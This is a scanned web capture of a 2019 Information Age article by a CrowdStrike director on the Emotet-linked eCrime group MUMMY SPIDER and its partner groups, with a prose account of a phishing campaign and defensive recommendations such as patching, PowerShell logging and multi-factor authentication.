www.information-age.com
Open in
urlscan Pro
18.133.176.247
Public Scan
URL:
https://www.information-age.com/ecrime-cyber-network-13708/
Submission: On January 12 via manual from US — Scanned from GB
Submission: On January 12 via manual from US — Scanned from GB
Form analysis 2 forms found in the DOM
GET https://www.information-age.com/
<form role="search" method="get" class="search-form" action="https://www.information-age.com/">
<label for="search-form-2">
<span class="screen-reader-text">Search for:</span>
</label>
<input type="search" id="search-form-2" class="search-field" placeholder="Search" value="" name="s">
<button type="submit" class="search-submit">
<svg class="svg-icon" width="28" height="28" aria-hidden="true" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path
d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z">
</path>
<path d="M0 0h24v24H0z" fill="none"></path>
</svg>
<!-- <span class="screen-reader-text">Search</span> -->
<span class="search-text" style="display: none;">Search</span>
</button>
</form>GET https://www.information-age.com/
<form role="search" method="get" class="search-form" action="https://www.information-age.com/">
<label for="search-form-2">
<span class="screen-reader-text">Search for:</span>
</label>
<input type="search" id="search-form-2" class="search-field" placeholder="Search" value="" name="s">
<button type="submit" class="search-submit">
<svg class="svg-icon" width="28" height="28" aria-hidden="true" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path
d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z">
</path>
<path d="M0 0h24v24H0z" fill="none"></path>
</svg>
<!-- <span class="screen-reader-text">Search</span> -->
<span class="search-text" style="display: none;">Search</span>
</button>
</form>Text Content
WE VALUE YOUR PRIVACY
We and our partners store and/or access information on a device, such as cookies
and process personal data, such as unique identifiers and standard information
sent by a device for personalised ads and content, ad and content measurement,
and audience insights, as well as to develop and improve products. With your
permission we and our partners may use precise geolocation data and
identification through device scanning. You may click to consent to our and our
partners’ processing as described above. Alternatively you may access more
detailed information and change your preferences before consenting or to refuse
consenting. Please note that some processing of your personal data may not
require your consent, but you have a right to object to such processing. Your
preferences will apply to this website only. You can change your preferences at
any time by returning to this site or visit our privacy policy.
MORE OPTIONSAGREE
Skip to content
Information Age
Insight and Analysis for the CTO
* Subscribe
* Login
* facebook
* twitter
* linkedin
* RSS
Search for: Search
* News
* People Moves
* Major Contracts
* Releases & Updates
* The City & Wall Street
* Events
* Data & Insight
* Webinars
* Research
* Whitepapers
* Insight Guides
* Buyers Guides
* How it Works
* What it Means
* Business Skills
* Sectors
* Agriculture
* Automotive
* Aviation
* Construction & Civil Engineering
* Consumer Electronics & Mobile
* Media & Marketing
* Defence
* Education
* Energy
* Financial Services
* Government & Public Sector
* Healthcare
* Legal & Accountancy
* Life Sciences
* Manufacturing
* Not for profit
* Property
* Retail
* Technology
* Telecoms
* Transport & Logistics
* Travel & Leisure
* Utilities
* Topics
* AI & Machine Learning
* Automation
* Blockchain
* Business Continuity
* Business & Strategy
* CIO and CTO
* Cloud & Edge Computing
* Communications & Networking
* Cybersecurity
* Cyber Innovation
* Data Storage & Data Lakes
* Data Analytics & Data Science
* Data Protection & Privacy
* Development & Programming
* DevOps
* Digital Transformation
* Disruptive Innovation
* Transformation in Action
* Emerging Technology & Innovation
* Governance, Risk and Compliance
* Hardware & Peripherals
* Immersive Technology
* IoT and M2M
* IT management
* Legislation & Regulation
* Outsourcing
* Robotics
* Smart Cities
* Software and Applications
* Start-up scene
* Tech and Society
* Tech Giants
* Tech M&A
* IPOs
* M&A
* PE & VC
* Careers
* Business Skills
* Companies
* Major Contracts
* Releases & Updates
* Recruitment
* Jobs
* Regions
* Americas
* Asia-Pacific
* EMEA
Search for: Search
* News
* People Moves
* Major Contracts
* Releases & Updates
* The City & Wall Street
* Events
* Data & Insight
* Webinars
* Research
* Whitepapers
* Insight Guides
* Buyers Guides
* How it Works
* What it Means
* Business Skills
* Sectors
* Agriculture
* Automotive
* Aviation
* Construction & Civil Engineering
* Consumer Electronics & Mobile
* Media & Marketing
* Defence
* Education
* Energy
* Financial Services
* Government & Public Sector
* Healthcare
* Legal & Accountancy
* Life Sciences
* Manufacturing
* Not for profit
* Property
* Retail
* Technology
* Telecoms
* Transport & Logistics
* Travel & Leisure
* Utilities
* Topics
* AI & Machine Learning
* Automation
* Blockchain
* Business Continuity
* Business & Strategy
* CIO and CTO
* Cloud & Edge Computing
* Communications & Networking
* Cybersecurity
* Cyber Innovation
* Data Storage & Data Lakes
* Data Analytics & Data Science
* Data Protection & Privacy
* Development & Programming
* DevOps
* Digital Transformation
* Disruptive Innovation
* Transformation in Action
* Emerging Technology & Innovation
* Governance, Risk and Compliance
* Hardware & Peripherals
* Immersive Technology
* IoT and M2M
* IT management
* Legislation & Regulation
* Outsourcing
* Robotics
* Smart Cities
* Software and Applications
* Start-up scene
* Tech and Society
* Tech Giants
* Tech M&A
* IPOs
* M&A
* PE & VC
* Careers
* Business Skills
* Companies
* Major Contracts
* Releases & Updates
* Recruitment
* Jobs
* Regions
* Americas
* Asia-Pacific
* EMEA
* Subscribe
* Login
Home » BYOD » Caught in the spider’s web: demystifying the eCrime cyber network
CAUGHT IN THE SPIDER’S WEB: DEMYSTIFYING THE ECRIME CYBER NETWORK
by Editor's Choice9 May 2019
*
*
*
*
*
One thing was clear in 2018: law enforcement efforts have not yet halted or
deterred eCrime actors and their cybercrime campaigns. Throughout the year
CrowdStrike observed the rise of ‘Big Game Hunting’ tactics being leveraged in
pursuit of financial payoff, along with a range of criminal adversaries engaging
in notably more aggressive intrusions.
eCrime was prominent in 2018. Common adversaries operating within criminal
networks were tracked conducting a range of operations such as crimeware
distribution, banking Trojans, ransomware, point of sale compromises, and
targeted spear-phishing campaigns. However, one of the most concerning eCrimes
trends was the solidification of a prominent eCrime ‘ecosystem’.
Much like a nation-state, eCrime adversaries rarely work alone, and in 2018 the
malware distribution threat MUMMY SPIDER solidified new and existing
relationships, cementing the reality of a serious eCrime ecosystem of
adversaries. MUMMY SPIDER now sits in the centre of a web of advanced eCrime
adversaries which cover a range of attack tactic expertise, from ransomware, to
point of sale, to banking trojans. Collaboration between these groups has only
made the collective stronger, and in order to defeat them we need to understand
the entire network.
In order to untangle this web of e-criminals, we need to find the driver of the
network and understand their motivations and approaches to cyber-attacks, which
in turn will allow us to understand what connects these actors together – and
eventually cut the head off the snake.
> RAISING THE STAKES IN THE GLOBAL CYBER ARMS RACE
>
> Our global adversaries will be forced to adapt and deploy stealthier tactics
> in order to continue profiting from cyber attacks, says new report
> CrowdStrike. Read here
THE HEAD OF THE SERPENT: MUMMY SPIDER
MUMMY SPIDER is a criminal entity linked to the core development of the malware
most commonly known as Emotet or Geodo. It first appeared in mid-2014, it
swiftly became a formidable adversary by developing increasingly aggressive
forms of malware. It does not follow typical criminal behaviour patterns, as it
usually conducts attacks for a few months before going underground for a period
of three to 12 months before returning with a new malware variant.
In 2017, the adversary made a conscious shift away from using banking trojans to
a crimeware downloader service. Furthermore, in 2018 it made efforts to render
its malware more resilient, and thus more attractive to potential ‘customers’.
MUMMY SPIDER conducts regular waves of spam campaigns to spread Emotet: these
campaigns often use general invoicing and payroll themes. Following infection,
Emotet uses geo-targeting to determine which payload to deliver to the victim
machine. Over the summer of 2018, in addition to supporting the download of
TinyLoader, TrickBot and ZeuS Panda, CrowdStrike Intelligence observed Emotet
infections propagating MUMMY SPIDER’s own SMB Spreader to machines in the US,
Canada, Germany, UK, Japan and Australia.
In 2018, MUMMY SPIDER solidified its eCrime stronghold, arming itself with a web
of pre-existing and new relationships with other adversaries. It continued
supporting WIZARD SPIDER (Russian based threat group) through the latter half of
the year, while adding geo-targeting distribution for BokBot (LUNAR SPIDER –
Eastern European-based operator and developer of banking malware) and Gozi ISFB.
INDRIK SPIDER (a sophisticated eCrime group that has been operating Dridex since
June 2014) was also seen to continue its historic relationship with MUMMY SPIDER
during 2018, although downloads of Dridex by Emotet remain rare. Other members
of this established network include Individual Operators such as Panda Zeus,
Nymaim and Gootkit.
> CYBER SECURITY BEST PRACTICE: DEFINITION, DIVERSITY, TRAINING, RESPONSIBILITY
> AND TECHNOLOGY
>
> As part of Information Age’s Cyber Security Month, we look at cyber security
> best practice – everything from defining it to the importance of training.
> Read here
INTO THE TANGLED WEB: WHY MULTIPLE SPIDERS ARE WORSE THAN ONE
In order to illustrate why a network of e-criminals presents a greater challenge
for those within the cyber-security industry, we can use a recent example of
MUMMY SPIDER activity to demonstrate. In November 2018, a significant phishing
campaign was identified which was having widespread effects. Based on the sheer
volume of victims, it turned out to be one of the largest Emotet campaigns that
have ever been observed by a cyber-security firm. CrowdStrike was able to
attribute this activity with high confidence to MUMMY SPIDER. . CrowdStrike uses
the naming convention ‘SPIDER’ to identify eCriminal groups around the globe.
The phishing campaign by MUMMY SPIDER consisted of a malicious macro-enabled
Microsoft Word document sent as an email attachment. When recipients opened the
weaponised document and macros are enabled on the machine which is quite
typical, an obfuscated PowerShell command was launched. This command allowed an
Emotet dropper to be installed through a remote C2 infrastructure, which in turn
downloaded the Emotet malware as the first-stage implant. Once infected, more
malware was able to infiltrate the system based on its geographic location.
Where the ecosystem came into play was the second-stage malware download. One of
the downloads, TrickBot, is attributed to the eCrime actor group WIZARD SPIDER.
The other second-stage download, BokBot, is attributed to the eCrime actor LUNAR
SPIDER. What intelligence can tell is, is that these groups cooperate with MUMMY
SPIDER to gain access to Emotet’s victims. MUMMY SPIDER breaks down the door
into a weak system, and in turn, allows a flurry of smaller groups to scurry in
to take advantage of a vulnerability and execute further criminal activities
whilst the system is vulnerable.
Furthermore, the spiders web does not stop with MUMMY SPIDER’s immediate
associates, we must also consider the further connections which these groups
have. For instance, INDRIK SPIDER has known connections to TINY SPIDER and
SKELETON SPIDER, both which benefit from distributed malware from INDRIK.
> THE TRUE COST OF CYBERCRIME? $5.2 TRILLION APPARENTLY
>
> Cybercrime could cost companies $5.2 trillion over next five years, according
> to new research from Accenture. Read here
DON’T GET ENSNARED: AVOID FALLING INTO THE ECRIME WEB
Whilst the web of e-criminals may seem daunting, there are a range of best
practices which businesses can consider in order to protect themselves against
these double fronted attacks. If the first adversary cannot break through your
barriers, its network will remain out of the loop as well;
• Develop a post-recovery strategy: Recovery is not the last step in remediating
a ransomware attack — as this event clearly illustrates. Organisations need to
know how the adversary got in before they can be sure they were successfully
ejected.
• Build an incident plan: Review and test that plan to make sure it’s up to date
and its relevant for the threats that face your organisation. Running table top
simulations improves reaction times and having Incident response retainers
ensures you have relevant support.
• Upgrade operating systems: CrowdStrike constantly sees organisations
compromised because they haven’t upgraded to supported operating systems or
applied relevant critical patches. The savings gained by stretching the life of
an outdated system are not worth the risks. Bolstering your defences around
these devices can provide some additional protection while working on the
upgrade plan.
• Upgrade to PowerShell V5 and remove previous versions: Logging in this version
of PowerShell is so robust that security teams can see commands being executed
in real time. If companies would update to V5 across the enterprise, their own
security teams could see what is happening and respond right away. Also,
removing previous versions of PowerShell in the enterprise will aid in
preventing downgrade attacks. This is the same for other applications on your
network. Security hygiene is a key to success in improving how your network
operates.
• Leverage multi-factor authentication (MFA) for all users and privilege access
management tools: Make it as difficult as possible for adversaries to get access
to and leverage both user and admin credentials from outside your network. Once
they have those, they can do whatever they want in the environment. In addition
to MFA, a more robust privilege access management process will limit the damage
adversaries can do if they get in.
There are many things that can be done to reduce the risk of intrusion and
employee programs can also assist with this. If you don’t have all the resources
you need consider working with a 3rd party who offer services such as Table Top
exercises, compromise assessments and Incident response retainers to demonstrate
your maturity and hopefully reduce or prevent incidents in your environment.
Written by John Titmus, director EMEA at CrowdStrike
Nominations are OPEN for the Tech Leaders Awards, organised by Information Age
and taking place on 12th September 2019 at the Royal Lancaster, London.
Categories include CIO of the Year, CTO of the Year, Digital Leader of the Year
and Security Leader of the Year. Recognise and reward excellence in the tech
industry by submitting a nomination today
Tagged: Cybercrime, eCrime, Multi-factor Authentication
EDITOR'S CHOICE
Editor's Choice consists of the best articles written by third parties and
selected by our editors. You can contact us at timothy.adler at stubbenedge.com
More by Editor's Choice
RELATED TOPICS
Cybercrime
eCrime
Multi-factor Authentication
RELATED STORIES
Cybersecurity
CYBERSECURITY PREDICTIONS FOR 2023
Cybersecurity
OVER 200 MILLION EMAIL ADDRESSES STOLEN IN TWITTER CYBER ATTACK
Cybersecurity
WHY DIVERSITY MATTERS WHEN RECRUITING CYBERSECURITY STAFF
Cybersecurity
FRAUD RINGS SCALING ATTACKS AROUND THE CLOCK — ONFIDO RESEARCH
Helping you grow your business is our number one priority, if you would like to
take your business to the next step just sign up!
sign up now
Adobe - San Jose
Production Service Engineer 5
Spotify - London
Senior Machine Learning Engineer, Speak
Discover Financial Services - Remote
Senior Manager, Software Engineering
Apple - Cork
SPS Technical Support Advisor - French
Multiverse - London
Data & Research Apprentice
RELATED STORIES
Cybersecurity
CYBERSECURITY PREDICTIONS FOR 2023
Cybersecurity
OVER 200 MILLION EMAIL ADDRESSES STOLEN IN TWITTER CYBER ATTACK
Cybersecurity
WHY DIVERSITY MATTERS WHEN RECRUITING CYBERSECURITY STAFF
Cybersecurity
WHY STAFF LOSING LAPTOPS COSTS MORE THAN RANSOMWARE ATTACKS
We provide general intelligence for technologists in the information age. We
support CTOs, CIOs and other technology leaders in managing business critical
issues both for today and in the future.
FURTHER INFORMATION
* Privacy Policy
* Terms & Conditions
* Contact Us
* About
* Media Packs
* Contributor Guidelines
CONTACT US
* +44(0) 207 846 1378
ADDRESS
* Stubben Edge
* 77 Cornhill
* London
* EC3V 3QQ